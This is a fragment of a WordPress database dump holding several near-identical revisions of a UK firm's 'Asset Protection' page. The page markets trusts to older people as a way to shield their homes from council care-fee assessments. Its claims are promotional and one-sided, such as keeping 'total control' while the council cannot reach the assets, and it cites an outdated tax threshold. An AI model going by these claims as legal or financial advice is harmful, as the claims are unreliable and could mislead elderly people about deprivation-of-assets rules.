class=\"wpcf7-response-output wpcf7-display-none\"></div>\r\n</form></div>\r\n</div>\r\n</div>\r\n&nbsp;\r\n\r\n</div>\r\n</div>\r\n&nbsp;\r\n<div id=\"text-4\" class=\"widget widget_text\">\r\n<div class=\"widget-wrap\">\r\n<div class=\"textwidget\">\r\n<div class=\"tel\">Or call us on</div>\r\n</div>\r\n&nbsp;\r\n\r\n</div>\r\n</div>\r\n&nbsp;\r\n\r\n</div>\r\n&nbsp;\r\n\r\n<!-- end #content-sidebar-wrap -->\r\n<div class=\"after_content_sidebar_wrap\">\r\n<div id=\"text-5\" class=\"widget widget_text\">\r\n<div class=\"widget-wrap\">\r\n<div class=\"textwidget\">\r\n<div class=\"preferred-providers\">A few of our preferred providers</div>\r\n</div>\r\n&nbsp;\r\n\r\n</div>\r\n</div>\r\n&nbsp;\r\n\r\n</div>\r\n<!-- end .after_content_sidebar_wrap -->\r\n\r\n<!-- end .wrap -->\r\n\r\n<!-- end #inner -->\r\n<div id=\"footer\" class=\"footer\">\r\n<div class=\"wrap\">\r\n<div id=\"footer-nav\">\r\n\r\n&nbsp;\r\n<ul>\r\n<ul>\r\n 	<li><a href=\"/\">Wealth Management</a></li>\r\n</ul>\r\n</ul>\r\n&nbsp;\r\n<ul>\r\n<ul>\r\n 	<li><a href=\"/about-us/frequently-asked-questions\">FAQs</a></li>\r\n</ul>\r\n</ul>\r\n&nbsp;\r\n<ul>\r\n<ul>\r\n 	<li><a href=\"/about-us/testimonials\">Testimonials</a></li>\r\n</ul>\r\n</ul>\r\n&nbsp;\r\n<ul>\r\n<ul>\r\n 	<li><a href=\"/privacy-policy\">Privacy Policy</a></li>\r\n</ul>\r\n</ul>\r\n&nbsp;\r\n<ul>\r\n<ul>\r\n 	<li><a href=\"/wealth-management-glossary\">Glossary of Wealth Management Terms</a></li>\r\n</ul>\r\n</ul>\r\n&nbsp;\r\n<ul>\r\n<ul>\r\n 	<li><a href=\"/site-map\">Site map</a></li>\r\n</ul>\r\n</ul>\r\n&nbsp;\r\n<ul>\r\n<ul>\r\n 	<li><a href=\"https://rsr.wrapadviser.co.uk/\">Login</a></li>\r\n</ul>\r\n</ul>\r\n&nbsp;\r\n\r\n</div>\r\n&nbsp;\r\n\r\n&nbsp;\r\n<div class=\"creds\">\r\n\r\n© Copyright 2017 Equity SMART\r\n\r\n</div>\r\n</div>\r\n<!-- end .wrap -->\r\n\r\n</div>\r\n<!-- end #footer -->\r\n\r\n<!-- end #wrap -->\r\n<script type=\"text/javascript\"><![CDATA[jQuery(document).ready(function($) {$(\".myController\").jFlow({controller: \".jFlowControl\",slideWrapper : \"#jFlowSlider\",slides: \"#slides\",selectedWrapper: \"jFlowSelected\",width: \"870px\",height: \"400px\",timer: 6000,duration: 1000,loop: 1,effect: \"right\",prev: \".slider-previous\",next: \".slider-next\",auto: true});});]]></script><script type=\"text/javascript\"><![CDATA[ var addthis_config = {\"data_track_clickback\":false,\"data_track_addressbar\":false,\"data_track_textcopy\":false}; ]]></script><script type=\"text/javascript\" src=\"/wp-content/plugins/q-and-a/js/qa.js\"></script><script type=\"text/javascript\" src=\"/wp-content/plugins/contact-form-7/includes/js/jquery.form.js\"></script><script type=\"text/javascript\"><![CDATA[\r\n/* <![CDATA[ */ var _wpcf7 = {\"loaderUrl\":\"http://www.equalitywalk.org.uk/wp-content/plugins/contact-form-7/images/ajax-loader.gif\",\"sending\":\"Sending ...\"}; /* ]]]]><![CDATA[> */\r\n]]></script><script type=\"text/javascript\" src=\"/wp-content/plugins/contact-form-7/includes/js/scripts.js\"></script><script type=\"text/javascript\" src=\"/wp-content/themes/genesis/lib/js/menu/superfish.js\"></script><script type=\"text/javascript\" src=\"/wp-content/themes/genesis/lib/js/menu/superfish.args.js\"></script><script type=\"text/javascript\" src=\"/wp-content/plugins/genesis-slider/js/jflow.plus.js\"></script><!--wp_footer-->','Asset Protection','Did you know that 1 in 3 women & 1 in 4 men over 65 will go into care? And the Council can take all your assets - including your house - to pay for it?','inherit','closed','closed','','49-revision-v1','','','2017-09-21 17:07:15','2017-09-21 17:07:15','',49,'http://www.equalitywalk.org.uk/49-revision-v1',0,'revision','',0),(307,1,'2017-09-21 17:08:43','2017-09-21 17:08:43','And that the Council can take all your assets — including your house — to pay for the care? Only the last £14,500 is protected!\r\n\r\nSo just think what you could lose!\r\n<h4>You have 3 options:-</h4>\r\n<ol>\r\n<ol>\r\n 	<li>You could do nothing and hope for the best. This is not what we would recommend.</li>\r\n</ol>\r\n</ol>\r\n<ol>\r\n<ol>\r\n 	<li>You could transfer your assets to your family. By doing this you may protect your assets but you lose control. There are many things that can go wrong with this; your family may have to pay Capital Gains Tax on the asset, they may get divorced or go bankrupt, or simply fall out. Again, we don’t recommend this.</li>\r\n</ol>\r\n</ol>\r\n<ol>\r\n<ol>\r\n 	<li>Or you could transfer your assets including your house into an <em>Asset Protection Trust</em>. This allows you to have total control over your assets and helps protects them.</li>\r\n</ol>\r\n</ol>\r\nTo find out more about Asset Protection Trusts and to get the advice you need, please either call us on the telephone number above or complete our quick enquiry form below, and we’ll call you straight back to help you with your investment questions.\r\n\r\nWe are ready for your call.\r\n\r\nHow are your Assets considered for Long Term Care?\r\n<ul>\r\n<ul>\r\n 	<li>A Doctor, in conjunction with the family, will decide whether you need long term care.</li>\r\n</ul>\r\n</ul>\r\n<ul>\r\n<ul>\r\n 	<li>If you need nursing care, the Council must arrange for the care and they must pay for it.</li>\r\n</ul>\r\n</ul>\r\n<ul>\r\n<ul>\r\n 	<li>The council has the right to try and recover these costs and they may try to do this. It is more difficult for them to recover costs as the assets are no longer in your name, but in the name of the Trust. The Solicitor Trustees will always deal with the Local Authority and respond to any challenge. The CRAG Report (Charges for Residential Accommodation Guide) states that ‘it would be unreasonable to decide that deliberate deprivation had taken place if the deposit took place when the claimant was fit and healthy and could not have foreseen the need to move into residential accommodation’. Therefore the sooner a Trust is set up the better.</li>\r\n</ul>\r\n</ul>\r\n<ul>\r\n<ul>\r\n 	<li>The Council will fund your care up to their maximum funding rate but the Care Homes normally settle for this amount instead of demanding the private rate.</li>\r\n</ul>\r\n</ul>\r\nApart from care costs, the Asset Protection Trust has other big advantages. It will avoid Executory procedure on your death and save money. If most of your assets are in the trust then there will be no Executory Costs and your estate can be paid over to your beneficiaries without delay, usually within a couple of weeks. On death, estates normally cannot be paid out within the first 6 months, and can take up to two years to complete. Assets in a Trust are paid out immediately.\r\n\r\nEven if you have a mortgage on your property which you do not want to pay off, then we can, in some cases, still set up a Assets Protection Trust, as long as the lender agrees.\r\n\r\n&nbsp;\r\n\r\n<strong>Some commonly asked questions:</strong>\r\n\r\nWhy is it important? - If the time comes when you do need to go into care, you may find that the assets like your home that’s taken a lifetime to accumulate, can be used for the cost of care rather than going directly to your beneficiaries.\r\n\r\nMy family will take of me - Lots of things can change in your lifetime – we are seeing more children become dependent on their parents again due to the economic climate – it may never happen but the current fact speak for themselves that 1 in 4 men and 1 in 3 women unfortunately have to go into care when they are over 65.\r\n\r\nWill I get any benefit from it? - Like all things in life it is about making a plan for the eventuality – if the result can save you a significant sum in care costs then it is obviously worth it. Saving on expensive legal probate costs will be of value also.\r\n\r\nWhat if I don’t go into care? - Winding up your estate can be costly and time consuming so you will see the benefit by avoiding the in the costs and difficulty involved, in winding up your estate. A solicitor needs appointed when you die to carry out the necessary executory work particularly if the house is in your name and can be expensive. However if you have taken the right steps and you have appointed you home to the Trust then you will find that the Trustees can complete things quickly and efficiently on your behalf.\r\n\r\nWhat is the Solicitors role? - Keeping control as a Trustee will be important for you, so if you need to make any key changes or decisions about the Trust your appointed solicitor will always be on your side providing more peace of mind that you can’t be outvoted.\r\n\r\nI have heard that you need two Solicitors – is this true? - If you’re Will leaves your estate to more or one beneficiaries then it is important that there are two Solicitors as Trustees, to outvote the remaining family member Trustee. Otherwise he could take control. With two Solicitors this ensures that what you want to happen after your death will actually happen.\r\n\r\n&nbsp;\r\n\r\nCan I trust the Solicitors? - Solicitors have a duty of care and are bound by the laws of their profession by The Law Society in England and Wales and also The Law Society of Scotland and they cannot benefit from the Trust directly as named beneficiaries.\r\n\r\nWhat are the ongoing fees and costs? - There are NO ongoing fees. With this scheme you pay the fee to set up the Trust at the outset and have nothing further to pay unless you go into care and there is a dispute with the Council, which is very rare.\r\n\r\nWhat kinds of assets can be placed in the Trust? - You are not means tested by the local authority on any capital up to £14500 and is ignored  – you will tend to look first at other assets like your house, we will advice you on what would be best suited to being allocated to your Trust.\r\n\r\nCan other assets be added at a later date? - You can, as assets can be placed in the trust at a later although, this will start the 6 month clock ticking on  that particular asset.\r\n\r\nIs there any limit on the value of assets placed with the Trust? - The Asset Protection Trust will usually hold assets up to the value of the current Nil Rate Band (£325,000 for the tax year 2010/11) for each client, as any assets in excess of this would create an immediate charge to lifetime Inheritance Tax of 40%. There are however a number of other options to safeguard your assets if 2 Trusts do not cover your entire estate.\r\n\r\nWhen is the best time to set up the Trust? - We would recommend as quickly as possible after you have considered all you options. You will always be under scrutiny from Local Authorities to look back and  review the circumstances in which a Family Protection Trust was set up at any time. You will have less to worry about if it was apparent  you had expectation in entering long term care.\r\n\r\nCan I change my mind? - You have control so if anything changes you will have the choice for everything to revert to the way it was in your name only.\r\n\r\nCan I move house? - Yes, since you control the Trust you can move house in the usual way except that the deeds are signed by all the Trustees rather than by you alone; but that makes no difference.\r\n\r\nWhat happens if one of us dies? - Nothing. The Trust, and the protection that is provides, simply continues as before until the second person dies. The survivor continues to retain control of the Trust.\r\n\r\nWhat happens if one of us becomes incapacitated? - Nothing. The remaining Trustees simply continue as before. We also prepare Powers of Attorney as part of this process to allow this to happen. Otherwise without this arrangement, the family may have to go to Court to obtain a Guardianship Order which can be a very difficult and expensive process.\r\n\r\n&nbsp;\r\n<h3>What happens if one of the other Trustees die? - A new Trustee is simply assumed in their place.</h3>\r\nWho gets my estate when I die? - You will decide you your named beneficiaries are in your Will and letter of wishes. The Trustees will then look to execute your wishes in a timely fashion. Having two Solicitor Trustees ensures this happens quickly and efficiently.\r\n\r\nDo I need a Will then? - Yes, Wills are extremely important. Any estate which is in your name when you die will be dealt with according to the terms of your <a href=\"/wills-trust\" data-bitly-type=\"bitly_hover_card\">Will</a>, assuming the class of beneficiaries names remains the same. We will discuss this with you when setting up the trust.\r\n\r\n<!-- end .entry-content -->\r\n\r\n<!-- end .postclass -->\r\n\r\n<!--end #comments-->\r\n<div id=\"respond\"><form id=\"commentform\" action=\"/\" method=\"post\">\r\n<p class=\"form-submit\"><input id=\"submit\" name=\"submit\" type=\"submit\" value=\"Post Comment\" /></p>\r\n&nbsp;\r\n<p style=\"display: none;\"><input id=\"akismet_comment_nonce\" name=\"akismet_comment_nonce\" type=\"hidden\" value=\"f8d04d5f05\" /></p>\r\n&nbsp;\r\n\r\n</form></div>\r\n<!-- #respond -->\r\n\r\n<!-- end #content -->\r\n<div id=\"sidebar\" class=\"sidebar widget-area\">\r\n\r\n&nbsp;\r\n<div id=\"text-3\" class=\"widget widget_text\">\r\n<div class=\"widget-wrap\">\r\n<div class=\"textwidget\">\r\n\r\n<!-- AddThis Button BEGIN -->\r\n<div class=\"addthis_toolbox addthis_default_style addthis_32x32_style\"></div>\r\n<!-- AddThis Button END -->\r\n\r\n</div>\r\n&nbsp;\r\n\r\n</div>\r\n</div>\r\n&nbsp;\r\n<div id=\"text-2\" class=\"widget widget_text\">\r\n<div class=\"widget-wrap\">\r\n<div class=\"textwidget\">\r\n<div id=\"sidebar-contact-form\">\r\n<div id=\"wpcf7-f447-w1-o1\" class=\"wpcf7\"><form class=\"wpcf7-form\" action=\"../../asset-protection/\" method=\"post\">&nbsp;\r\n<div style=\"display: none;\"><input name=\"_wpcf7\" type=\"hidden\" value=\"447\" /><input name=\"_wpcf7_version\" type=\"hidden\" value=\"3.2\" /><input name=\"_wpcf7_unit_tag\" type=\"hidden\" value=\"wpcf7-f447-w1-o1\" /><input name=\"_wpnonce\" type=\"hidden\" value=\"fccd9351f5\" /></div>\r\n&nbsp;\r\n\r\nYour Name (required)\r\n<span class=\"wpcf7-form-control-wrap your-name\"><input class=\"wpcf7-form-control wpcf7-text wpcf7-validates-as-required\" name=\"your-name\" size=\"40\" type=\"text\" value=\"\" /></span>\r\n\r\n&nbsp;\r\n\r\nYour Email (required)\r\n<span class=\"wpcf7-form-control-wrap your-email\"><input class=\"wpcf7-form-control wpcf7-text wpcf7-email wpcf7-validates-as-required wpcf7-validates-as-email\" name=\"your-email\" size=\"40\" type=\"text\" value=\"\" /></span>\r\n\r\n&nbsp;\r\n\r\nYour Message\r\n<span class=\"wpcf7-form-control-wrap your-message\"><textarea class=\"wpcf7-form-control wpcf7-textarea\" cols=\"40\" name=\"your-message\" rows=\"10\"></textarea></span>\r\n\r\n&nbsp;\r\n<div class=\"side-contact-submit\"><input class=\"wpcf7-form-control wpcf7-submit\" type=\"submit\" value=\"Send Your Message\" /></div>\r\n&nbsp;\r\n<div class=\"wpcf7-response-output wpcf7-display-none\"></div>\r\n</form></div>\r\n</div>\r\n</div>\r\n&nbsp;\r\n\r\n</div>\r\n</div>\r\n&nbsp;\r\n<div id=\"text-4\" class=\"widget widget_text\">\r\n<div class=\"widget-wrap\">\r\n<div class=\"textwidget\">\r\n<div class=\"tel\">Or call us on</div>\r\n</div>\r\n&nbsp;\r\n\r\n</div>\r\n</div>\r\n&nbsp;\r\n\r\n</div>\r\n&nbsp;\r\n\r\n<!-- end #content-sidebar-wrap -->\r\n<div class=\"after_content_sidebar_wrap\">\r\n<div id=\"text-5\" class=\"widget widget_text\">\r\n<div class=\"widget-wrap\">\r\n<div class=\"textwidget\">\r\n<div class=\"preferred-providers\">A few of our preferred providers</div>\r\n</div>\r\n&nbsp;\r\n\r\n</div>\r\n</div>\r\n&nbsp;\r\n\r\n</div>\r\n<!-- end .after_content_sidebar_wrap -->\r\n\r\n<!-- end .wrap -->\r\n\r\n<!-- end #inner -->\r\n<div id=\"footer\" class=\"footer\">\r\n<div class=\"wrap\">\r\n<div id=\"footer-nav\">\r\n\r\n&nbsp;\r\n<ul>\r\n<ul>\r\n 	<li><a href=\"/\">Wealth Management</a></li>\r\n</ul>\r\n</ul>\r\n&nbsp;\r\n<ul>\r\n<ul>\r\n 	<li><a href=\"/about-us/frequently-asked-questions\">FAQs</a></li>\r\n</ul>\r\n</ul>\r\n&nbsp;\r\n<ul>\r\n<ul>\r\n 	<li><a href=\"/about-us/testimonials\">Testimonials</a></li>\r\n</ul>\r\n</ul>\r\n&nbsp;\r\n<ul>\r\n<ul>\r\n 	<li><a href=\"/privacy-policy\">Privacy Policy</a></li>\r\n</ul>\r\n</ul>\r\n&nbsp;\r\n<ul>\r\n<ul>\r\n 	<li><a href=\"/wealth-management-glossary\">Glossary of Wealth Management Terms</a></li>\r\n</ul>\r\n</ul>\r\n&nbsp;\r\n<ul>\r\n<ul>\r\n 	<li><a href=\"/site-map\">Site map</a></li>\r\n</ul>\r\n</ul>\r\n&nbsp;\r\n<ul>\r\n<ul>\r\n 	<li><a href=\"https://rsr.wrapadviser.co.uk/\">Login</a></li>\r\n</ul>\r\n</ul>\r\n&nbsp;\r\n\r\n</div>\r\n&nbsp;\r\n\r\n&nbsp;\r\n<div class=\"creds\">\r\n\r\n© Copyright 2017 Equity SMART\r\n\r\n</div>\r\n</div>\r\n<!-- end .wrap -->\r\n\r\n</div>\r\n<!-- end #footer -->\r\n\r\n<!-- end #wrap -->\r\n<script type=\"text/javascript\"><![CDATA[jQuery(document).ready(function($) {$(\".myController\").jFlow({controller: \".jFlowControl\",slideWrapper : \"#jFlowSlider\",slides: \"#slides\",selectedWrapper: \"jFlowSelected\",width: \"870px\",height: \"400px\",timer: 6000,duration: 1000,loop: 1,effect: \"right\",prev: \".slider-previous\",next: \".slider-next\",auto: true});});]]></script><script type=\"text/javascript\"><![CDATA[ var addthis_config = {\"data_track_clickback\":false,\"data_track_addressbar\":false,\"data_track_textcopy\":false}; ]]></script><script type=\"text/javascript\" src=\"/wp-content/plugins/q-and-a/js/qa.js\"></script><script type=\"text/javascript\" src=\"/wp-content/plugins/contact-form-7/includes/js/jquery.form.js\"></script><script type=\"text/javascript\"><![CDATA[\r\n/* <![CDATA[ */ var _wpcf7 = {\"loaderUrl\":\"http://www.equalitywalk.org.uk/wp-content/plugins/contact-form-7/images/ajax-loader.gif\",\"sending\":\"Sending ...\"}; /* ]]]]><![CDATA[> */\r\n]]></script><script type=\"text/javascript\" src=\"/wp-content/plugins/contact-form-7/includes/js/scripts.js\"></script><script type=\"text/javascript\" src=\"/wp-content/themes/genesis/lib/js/menu/superfish.js\"></script><script type=\"text/javascript\" src=\"/wp-content/themes/genesis/lib/js/menu/superfish.args.js\"></script><script type=\"text/javascript\" src=\"/wp-content/plugins/genesis-slider/js/jflow.plus.js\"></script><!--wp_footer-->','Asset Protection','Did you know that 1 in 3 women & 1 in 4 men over 65 will go into care? And the Council can take all your assets - including your house - to pay for it?','inherit','closed','closed','','49-revision-v1','','','2017-09-21 17:08:43','2017-09-21 17:08:43','',49,'http://www.equalitywalk.org.uk/49-revision-v1',0,'revision','',0),(308,1,'2017-09-21 17:09:27','2017-09-21 17:09:27',' ','','','publish','closed','closed','','308','','','2017-09-21 17:26:21','2017-09-21 17:26:21','',79,'http://www.equalitywalk.org.uk/?p=308',1,'nav_menu_item','',0),(309,1,'2017-09-21 17:10:24','2017-09-21 17:10:24','And that the Council can take all your assets — including your house — to pay for the care? Only the last £14,500 is protected!\r\n\r\nSo just think what you could lose!\r\n<h4>You have 3 options:-</h4>\r\n<ol>\r\n<ol>\r\n 	<li>You could do nothing and hope for the best. This is not what we would recommend.</li>\r\n</ol>\r\n</ol>\r\n<ol>\r\n<ol>\r\n 	<li>You could transfer your assets to your family. By doing this you may protect your assets but you lose control. There are many things that can go wrong with this; your family may have to pay Capital Gains Tax on the asset, they may get divorced or go bankrupt, or simply fall out. Again, we don’t recommend this.</li>\r\n</ol>\r\n</ol>\r\n<ol>\r\n<ol>\r\n 	<li>Or you could transfer your assets including your house into an <em>Asset Protection Trust</em>. This allows you to have total control over your assets and helps protects them.</li>\r\n</ol>\r\n</ol>\r\nTo find out more about Asset Protection Trusts and to get the advice you need, please either call us on the telephone number above or complete our quick enquiry form below, and we’ll call you straight back to help you with your investment questions.\r\n\r\nWe are ready for your call.\r\n\r\nHow are your Assets considered for Long Term Care?\r\n<ul>\r\n<ul>\r\n 	<li>A Doctor, in conjunction with the family, will decide whether you need long term care.</li>\r\n</ul>\r\n</ul>\r\n<ul>\r\n<ul>\r\n 	<li>If you need nursing care, the Council must arrange for the care and they must pay for it.</li>\r\n</ul>\r\n</ul>\r\n<ul>\r\n<ul>\r\n 	<li>The council has the right to try and recover these costs and they may try to do this. It is more difficult for them to recover costs as the assets are no longer in your name, but in the name of the Trust. The Solicitor Trustees will always deal with the Local Authority and respond to any challenge. The CRAG Report (Charges for Residential Accommodation Guide) states that ‘it would be unreasonable to decide that deliberate deprivation had taken place if the deposit took place when the claimant was fit and healthy and could not have foreseen the need to move into residential accommodation’. Therefore the sooner a Trust is set up the better.</li>\r\n</ul>\r\n</ul>\r\n<ul>\r\n<ul>\r\n 	<li>The Council will fund your care up to their maximum funding rate but the Care Homes normally settle for this amount instead of demanding the private rate.</li>\r\n</ul>\r\n</ul>\r\nApart from care costs, the Asset Protection Trust has other big advantages. It will avoid Executory procedure on your death and save money. If most of your assets are in the trust then there will be no Executory Costs and your estate can be paid over to your beneficiaries without delay, usually within a couple of weeks. On death, estates normally cannot be paid out within the first 6 months, and can take up to two years to complete. Assets in a Trust are paid out immediately.\r\n\r\nEven if you have a mortgage on your property which you do not want to pay off, then we can, in some cases, still set up a Assets Protection Trust, as long as the lender agrees.\r\n\r\n&nbsp;\r\n\r\n<strong>Some commonly asked questions:</strong>\r\n\r\nWhy is it important? - If the time comes when you do need to go into care, you may find that the assets like your home that’s taken a lifetime to accumulate, can be used for the cost of care rather than going directly to your beneficiaries.\r\n\r\nMy family will take of me - Lots of things can change in your lifetime – we are seeing more children become dependent on their parents again due to the economic climate – it may never happen but the current fact speak for themselves that 1 in 4 men and 1 in 3 women unfortunately have to go into care when they are over 65.\r\n\r\nWill I get any benefit from it? - Like all things in life it is about making a plan for the eventuality – if the result can save you a significant sum in care costs then it is obviously worth it. Saving on expensive legal probate costs will be of value also.\r\n\r\nWhat if I don’t go into care? - Winding up your estate can be costly and time consuming so you will see the benefit by avoiding the in the costs and difficulty involved, in winding up your estate. A solicitor needs appointed when you die to carry out the necessary executory work particularly if the house is in your name and can be expensive. However if you have taken the right steps and you have appointed you home to the Trust then you will find that the Trustees can complete things quickly and efficiently on your behalf.\r\n\r\nWhat is the Solicitors role? - Keeping control as a Trustee will be important for you, so if you need to make any key changes or decisions about the Trust your appointed solicitor will always be on your side providing more peace of mind that you can’t be outvoted.\r\n\r\nI have heard that you need two Solicitors – is this true? - If you’re Will leaves your estate to more or one beneficiaries then it is important that there are two Solicitors as Trustees, to outvote the remaining family member Trustee. Otherwise he could take control. With two Solicitors this ensures that what you want to happen after your death will actually happen.\r\n\r\n&nbsp;\r\n\r\nCan I trust the Solicitors? - Solicitors have a duty of care and are bound by the laws of their profession by The Law Society in England and Wales and also The Law Society of Scotland and they cannot benefit from the Trust directly as named beneficiaries.\r\n\r\nWhat are the ongoing fees and costs? - There are NO ongoing fees. With this scheme you pay the fee to set up the Trust at the outset and have nothing further to pay unless you go into care and there is a dispute with the Council, which is very rare.\r\n\r\nWhat kinds of assets can be placed in the Trust? - You are not means tested by the local authority on any capital up to £14500 and is ignored  – you will tend to look first at other assets like your house, we will advice you on what would be best suited to being allocated to your Trust.\r\n\r\nCan other assets be added at a later date? - You can, as assets can be placed in the trust at a later although, this will start the 6 month clock ticking on  that particular asset.\r\n\r\nIs there any limit on the value of assets placed with the Trust? - The Asset Protection Trust will usually hold assets up to the value of the current Nil Rate Band (£325,000 for the tax year 2010/11) for each client, as any assets in excess of this would create an immediate charge to lifetime Inheritance Tax of 40%. There are however a number of other options to safeguard your assets if 2 Trusts do not cover your entire estate.\r\n\r\nWhen is the best time to set up the Trust? - We would recommend as quickly as possible after you have considered all you options. You will always be under scrutiny from Local Authorities to look back and  review the circumstances in which a Family Protection Trust was set up at any time. You will have less to worry about if it was apparent  you had expectation in entering long term care.\r\n\r\nCan I change my mind? - You have control so if anything changes you will have the choice for everything to revert to the way it was in your name only.\r\n\r\nCan I move house? - Yes, since you control the Trust you can move house in the usual way except that the deeds are signed by all the Trustees rather than by you alone; but that makes no difference.\r\n\r\nWhat happens if one of us dies? - Nothing. The Trust, and the protection that is provides, simply continues as before until the second person dies. The survivor continues to retain control of the Trust.\r\n\r\nWhat happens if one of us becomes incapacitated? - Nothing. The remaining Trustees simply continue as before. We also prepare Powers of Attorney as part of this process to allow this to happen. Otherwise without this arrangement, the family may have to go to Court to obtain a Guardianship Order which can be a very difficult and expensive process.\r\n\r\n&nbsp;\r\n<h3>What happens if one of the other Trustees die? - A new Trustee is simply assumed in their place.</h3>\r\nWho gets my estate when I die? - You will decide you your named beneficiaries are in your Will and letter of wishes. The Trustees will then look to execute your wishes in a timely fashion. Having two Solicitor Trustees ensures this happens quickly and efficiently.\r\n\r\nDo I need a Will then? - Yes, Wills are extremely important. Any estate which is in your name when you die will be dealt with according to the terms of your <a href=\"/wills-trust\" data-bitly-type=\"bitly_hover_card\">Will</a>, assuming the class of beneficiaries names remains the same. We will discuss this with you when setting up the trust.\r\n','Asset Protection','Did you know that 1 in 3 women & 1 in 4 men over 65 will go into care? And the Council can take all your assets - including your house - to pay for it?','inherit','closed','closed','','49-revision-v1','','','2017-09-21 17:10:24','2017-09-21 17:10:24','',49,'http://www.equalitywalk.org.uk/49-revision-v1',0,'revision','',0);
INSERT INTO `wp_posts` VALUES (310,1,'2017-09-21 17:11:40','2017-09-21 17:11:40','And that the Council can take all your assets — including your house — to pay for the care? Only the last £14,500 is protected!\r\n\r\nSo just think what you could lose!\r\n<h4>You have 3 options:-</h4>\r\n<ol>\r\n<ol>\r\n 	<li>You could do nothing and hope for the best. This is not what we would recommend.</li>\r\n</ol>\r\n</ol>\r\n<ol>\r\n<ol>\r\n 	<li>You could transfer your assets to your family. By doing this you may protect your assets but you lose control. There are many things that can go wrong with this; your family may have to pay Capital Gains Tax on the asset, they may get divorced or go bankrupt, or simply fall out. Again, we don’t recommend this.</li>\r\n</ol>\r\n</ol>\r\n<ol>\r\n<ol>\r\n 	<li>Or you could transfer your assets including your house into an <em>Asset Protection Trust</em>. This allows you to have total control over your assets and helps protects them.</li>\r\n</ol>\r\n</ol>\r\nTo find out more about Asset Protection Trusts and to get the advice you need, please either call us on the telephone number above or complete our quick enquiry form below, and we’ll call you straight back to help you with your investment questions.\r\n\r\nWe are ready for your call.\r\n\r\nHow are your Assets considered for Long Term Care?\r\n<ul>\r\n<ul>\r\n 	<li>A Doctor, in conjunction with the family, will decide whether you need long term care.</li>\r\n</ul>\r\n</ul>\r\n<ul>\r\n<ul>\r\n 	<li>If you need nursing care, the Council must arrange for the care and they must pay for it.</li>\r\n</ul>\r\n</ul>\r\n<ul>\r\n<ul>\r\n 	<li>The council has the right to try and recover these costs and they may try to do this. It is more difficult for them to recover costs as the assets are no longer in your name, but in the name of the Trust. The Solicitor Trustees will always deal with the Local Authority and respond to any challenge. The CRAG Report (Charges for Residential Accommodation Guide) states that ‘it would be unreasonable to decide that deliberate deprivation had taken place if the deposit took place when the claimant was fit and healthy and could not have foreseen the need to move into residential accommodation’. Therefore the sooner a Trust is set up the better.</li>\r\n</ul>\r\n</ul>\r\n<ul>\r\n<ul>\r\n 	<li>The Council will fund your care up to their maximum funding rate but the Care Homes normally settle for this amount instead of demanding the private rate.</li>\r\n</ul>\r\n</ul>\r\nApart from care costs, the Asset Protection Trust has other big advantages. It will avoid Executory procedure on your death and save money. If most of your assets are in the trust then there will be no Executory Costs and your estate can be paid over to your beneficiaries without delay, usually within a couple of weeks. On death, estates normally cannot be paid out within the first 6 months, and can take up to two years to complete. Assets in a Trust are paid out immediately.\r\n\r\nEven if you have a mortgage on your property which you do not want to pay off, then we can, in some cases, still set up a Assets Protection Trust, as long as the lender agrees.\r\n\r\n&nbsp;\r\n\r\n<strong>Some commonly asked questions:</strong>\r\n\r\nWhy is it important? - If the time comes when you do need to go into care, you may find that the assets like your home that’s taken a lifetime to accumulate, can be used for the cost of care rather than going directly to your beneficiaries.\r\n\r\nMy family will take of me - Lots of things can change in your lifetime – we are seeing more children become dependent on their parents again due to the economic climate – it may never happen but the current fact speak for themselves that 1 in 4 men and 1 in 3 women unfortunately have to go into care when they are over 65.\r\n\r\nWill I get any benefit from it? - Like all things in life it is about making a plan for the eventuality – if the result can save you a significant sum in care costs then it is obviously worth it. Saving on expensive legal probate costs will be of value also.\r\n\r\nWhat if I don’t go into care? - Winding up your estate can be costly and time consuming so you will see the benefit by avoiding the in the costs and difficulty involved, in winding up your estate. A solicitor needs appointed when you die to carry out the necessary executory work particularly if the house is in your name and can be expensive. However if you have taken the right steps and you have appointed you home to the Trust then you will find that the Trustees can complete things quickly and efficiently on your behalf.\r\n\r\nWhat is the Solicitors role? - Keeping control as a Trustee will be important for you, so if you need to make any key changes or decisions about the Trust your appointed solicitor will always be on your side providing more peace of mind that you can’t be outvoted.\r\n\r\nI have heard that you need two Solicitors – is this true? - If you’re Will leaves your estate to more or one beneficiaries then it is important that there are two Solicitors as Trustees, to outvote the remaining family member Trustee. Otherwise he could take control. With two Solicitors this ensures that what you want to happen after your death will actually happen.\r\n\r\nCan I trust the Solicitors? - Solicitors have a duty of care and are bound by the laws of their profession by The Law Society in England and Wales and also The Law Society of Scotland and they cannot benefit from the Trust directly as named beneficiaries.\r\n\r\nWhat are the ongoing fees and costs? - There are NO ongoing fees. With this scheme you pay the fee to set up the Trust at the outset and have nothing further to pay unless you go into care and there is a dispute with the Council, which is very rare.\r\n\r\nWhat kinds of assets can be placed in the Trust? - You are not means tested by the local authority on any capital up to £14500 and is ignored  – you will tend to look first at other assets like your house, we will advice you on what would be best suited to being allocated to your Trust.\r\n\r\nCan other assets be added at a later date? - You can, as assets can be placed in the trust at a later although, this will start the 6 month clock ticking on  that particular asset.\r\n\r\nIs there any limit on the value of assets placed with the Trust? - The Asset Protection Trust will usually hold assets up to the value of the current Nil Rate Band (£325,000 for the tax year 2010/11) for each client, as any assets in excess of this would create an immediate charge to lifetime Inheritance Tax of 40%. There are however a number of other options to safeguard your assets if 2 Trusts do not cover your entire estate.\r\n\r\n<img class=\"size-medium wp-image-289 alignleft\" src=\"http://www.equalitywalk.org.uk/wp-content/uploads/2017/09/IMG_1113-300x200.jpg\" alt=\"\" width=\"300\" height=\"200\" />When is the best time to set up the Trust? - We would recommend as quickly as possible after you have considered all you options. You will always be under scrutiny from Local Authorities to look back and  review the circumstances in which a Family Protection Trust was set up at any time. You will have less to worry about if it was apparent  you had expectation in entering long term care.\r\n\r\n<strong>Can I change my mind? - You have control so if anything changes you will have the choice for everything to revert to the way it was in your name only.</strong>\r\n\r\nCan I move house? - Yes, since you control the Trust you can move house in the usual way except that the deeds are signed by all the Trustees rather than by you alone; but that makes no difference.\r\n\r\nWhat happens if one of us dies? - Nothing. The Trust, and the protection that is provides, simply continues as before until the second person dies. The survivor continues to retain control of the Trust.\r\n\r\nWhat happens if one of us becomes incapacitated? - Nothing. The remaining Trustees simply continue as before. We also prepare Powers of Attorney as part of this process to allow this to happen. Otherwise without this arrangement, the family may have to go to Court to obtain a Guardianship Order which can be a very difficult and expensive process.\r\n\r\n&nbsp;\r\n<h3>What happens if one of the other Trustees die? - A new Trustee is simply assumed in their place.</h3>\r\nWho gets my estate when I die? - You will decide you your named beneficiaries are in your Will 